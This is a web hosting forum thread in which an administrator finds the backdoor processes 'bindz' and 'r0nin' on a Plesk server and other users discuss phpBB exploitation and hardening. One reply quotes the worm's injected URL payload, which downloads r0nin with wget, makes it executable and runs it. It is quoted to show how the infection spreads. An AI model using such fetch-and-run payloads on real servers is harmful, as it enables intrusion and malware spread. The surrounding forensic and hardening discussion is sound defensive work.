Server hacked, but always was updated PLESK 7.5.3

[graffix]

Hello,

we´re very angry about this, and we found no security problem on our server.

We added for a client a new domain and see, that the httpd doesn´t start.

We logged into the server and see that 443 is already running.

Now we see under ps -axu these two services:

./bindz
&
./r0nin

We killed them and httpd is starting normally

But why comes these two service on the updated machine?

We use RedHat FC2 yum ist up to date, so we doesn´t see the security problem!

Can anybody help us to resolve this problem? We opened a ticket to sw-soft, but no answer at this time!

Thanks for the help.

 

[Griffith]

This is probably not a plesk issue, rather a security issue on your server... check that you have mod_security, firewall etc .. many posts about this in the forums...

 

[tandberg]

the processes you mention are mostly installed via phpBB, postNuke etc.
If you have rootkits etc. on the server, the best solution is to do a clean reinstall as many binaries can be affected opening backdoors.
After a clean install remount your /tmp dir nonexec, remove gcc and wget from the server.
Have a look on the existing httpdirs for phpBB and postNuke and update asap.

 

[graffix]

Thanks for the replays, but i think it is always a lot of a plesk problem: execution rights on /temp is very risky?!

The same issue has confixx. Other Panels has not same problem.

So my luck was, the wget was renamed on this server, so no other files was loaded on the server.

I run chkrootkit to see if more is infected.

 

[tandberg]

Just have a look how the "tools" are spreading ..

http://www.to.be.infected.pc/test.gif?&cmd=cd /;cd tmp;mkdir%...
%20.x;wget%20www.havingworm.pc/worm/r0nin;chmod%20777%20r0nin;./r0nin

making /tmp nonexec would leave the bin in /tmp but not executed. Never compile chkrootkit on an infected system. Build it elsewere then check with the static compiled version.
Again, this is not a plesk issue - thats a php problem.

 

[jshanley]

It's not technically a Plesk issue, but plesk does distribute a vulnerable (hackable) version of phpBB in their Application Vault, right? I don't think they've updated the application to a non-vulnerable version. So I think if you use the Application Vault version of phpBB, you will get hacked again.

 

[atomicturtle]

Some real lightwieght forensics here, before killing the process, look to see what user it is running as (ps aux). If it is running as apache, its most likely an exploitable php app. If its running as some other user, probably an exploitable cgi-bin app, and if its running as root, it was probably an exploitable service.

I've got rpm's for chkrootkit, and rkhunter in my archive, and in addition I've been developing a security suite targetted at securing hosting servers called Atomic Secured Linux (ASL). That project includes both a kernel hardened specifically for security, and an intrusion detection/response layer with mod_security and mod_dosevasive. We also currently maintain the largest signature database for mod_security (well over a thousand signatures at this date)

 

[graffix]

Thanks for the answers ...
it´s very difficult to find, what customer/clients
php programm has an vulnerable.

We moved the backdoor programms to secure home dir.

But why did all php programs use the /temp instead of /home/httpd/vhosts/phptemp and run in only user rights instead of apache?

Whatever, we must search for a good way to secure our server.

Using Virtuozzo is more stable? The kernel here is not overloaded and smaller, but the build? very old 2.4xx

Have someone a good idea?

Thanks

 

[Cranky]

2.4.xx kernels are fine if you're running Virtuozzo ... the latest Virtuozzo kernel for VZ 2.6.1 is 2.4.20-021stab028.12.777, a 2.6.x kernel is due later in the year.

You need to make sure you're running a firewall, try mod_security to tighten up security and rkhunter, chkrootkit as suggested and you might find if you've been rooted.

Your best bet if you're running the Virtuozzo node would be to create another VE and copy the plesk data across from your existing VE to ensure you're running safe binaries. Alternatively you could just create a new VE and copy the binaries from that to your existing server. MAKE BACKUPS FIRST

 

[BoXie]

I had this exact same process running some time ago : 'r0nin' .

It was a phpBB exploit and had some garbage in /tmp also.

No more phpBB on my servers !! Last week another phpBB expoit came in .. on the previous version of phpBB.

phpBB is as leak as a fishing net. (That is how we dutch people would say that

 

[smtalk]

Just secure your /tmp

 

[BoXie]

Is there a way to secure /tmp if it isn't mounted ? But just a directory ?

 

[Griffith]

even though you secure /tmp they can still run .pl files etc.. (correct me if i'm wrong)

 

[atomicturtle]

/tmp isnt really enough, the badguys can run their exploits from any directory writable by the webserver. I see them running in the users httpdocs these days as often as I see then running from /tmp or /var/tmp. Here are a few examples of what ASL has caught:


From 172.150.XX.XXX: denied untrusted exec of /var/tmp/za/zero by /bin/bash[sh:2905] uid/euid:48/48 gid/egid:48/48, parent /bin/bash[sh:32502] uid/euid:48/48 gid/eg8

attacker trying to run /var/tmp/za that they've uploaded and tried to run as apache (48/48)

heres another system where theyre running it from the users directory:
From 83.91.XX.XX denied untrusted exec of /home/httpd/vhosts/DOMAIN.COM/httpdocs/albums/DOMAIN/img/.htaccess/.kiki/y2kupdate by /bin/bash[sh:20555] uid/euid:48/48 gid/egid:48/48

This time the attacker shifted the exploit to a writable home directory, as /tmp was mounted noexec. Side note on this one, the app exploited was 100% custom code, so this wasn't your standard canned phpBB attack.

In both cases however, the attack didn't work (although the applications were still exploitable) since ASL treats apache as an untrusted user, and will only let it execute apps owned by root. Its a simple way to in essence make the whole system noexec, but without the collatoral damage that would cause otherwise.

 

[Griffith]

Is it possible to get more info about asl?

 

[atomicturtle]

The current page for the project is here:
http://www.atomicrocketturtle.com/subscription.html

The primary site for ASL will one day soon(tm) be here: http://atomicorp.com

 

[BoXie]

I'm not a real Linux guru .. but isn't ASL a little bit like SELinux ?

 

[atomicturtle]

Yes, SELinux is a subset of what is available in ASL with 2.6 kernels. In addition to that, ASL includes more kernel based hardening with grsec/PaX, and userspace intrusion detection/response with mod_security and mod_dosevasive. We currently maintain the largest archive of mod_security signatures (well over 1000 now) through our security portal at gotroot.com.

The idea is to to approach this with a security-in-depth model, TPE (trusted path execution), RBAC (grsec and selinux), IDS (mod_security/mod_dosevasive), PaX (grsec), etc, all support each other. If an attacker can defeat one component, there are other pieces in the system to catch those failures.

 

[jshanley]

A+

In short, Atomic is trying to save admins the time and work involved in setting up a much more hardened Linux environment, from which they can run Plesk. In exchange, all he asks for is a couple bucks for the effort.

If I ran Plesk on Linux, I'd seriously consider it - not because I can't do those things myself, but because it saves a lot of time and effort that could be spent elsewhere on the business.

Anyway. I suppose I'm leaning dangerously close to "promotion" here, so I'll stop He definately knows what he's doing, though.

 

[Griffith]

Atomic: if I use the mod_security rules at gotroot.com, are there any "problems" since the rulefiles are big?